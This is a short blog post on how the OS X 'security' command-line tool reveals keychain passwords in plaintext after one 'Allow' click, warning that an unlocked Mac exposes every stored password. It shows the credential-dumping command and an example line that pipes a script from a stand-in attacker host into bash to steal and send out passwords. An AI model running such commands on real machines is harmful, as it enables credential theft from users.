Dumping cleartext passwords from the OS X keychain


Most people know that you can get the cleartext password stored in the OS X “login” keychain by opening the “Keychain Access” app, navigating to the entry and entering your account’s password:

What I didn’t realize until recently is that this is just an artificial barrier introduced by Apple that doesn’t really have any effect. Let me demonstrate by first creating an example account:

Now we will retrieve the password in plaintext without entering the account’s password with the help of /usr/bin/security, which should come with every recent OS X:

$ /usr/bin/security \
    find-internet-password -g \
    -a timcook \
    -s security.apple.com

The only thing that stands between whoever has access to your terminal and the plaintext password is a single click on “Allow”:

keychain: "/Users/lucas/Library/Keychains/login.keychain"
class: "inet"
attributes:
    [...]
    "acct"="timcook"
    [...]
    "srvr"="security.apple.com"
password: ""

Bottom line is that, if you leave your Mac unlocked and unattended for even a few minutes, you can basically consider all your passwords compromised. For example, somebody could fire up a terminal and run

$ curl http://badperson.com/get-passwords.sh | bash

which could dump all your keychain’s passwords and post them back to the attackers server. This would take between 10 and 30 seconds depending on their typing speed.

Note: I don’t really feel qualified to discuss if there is a better way to handle this. Because you know, having to enter your password all the time sucks too disappointed I just wanted to point out that whoever has access to your terminal can be considered to have access to all your passwords.

Let me know what you think!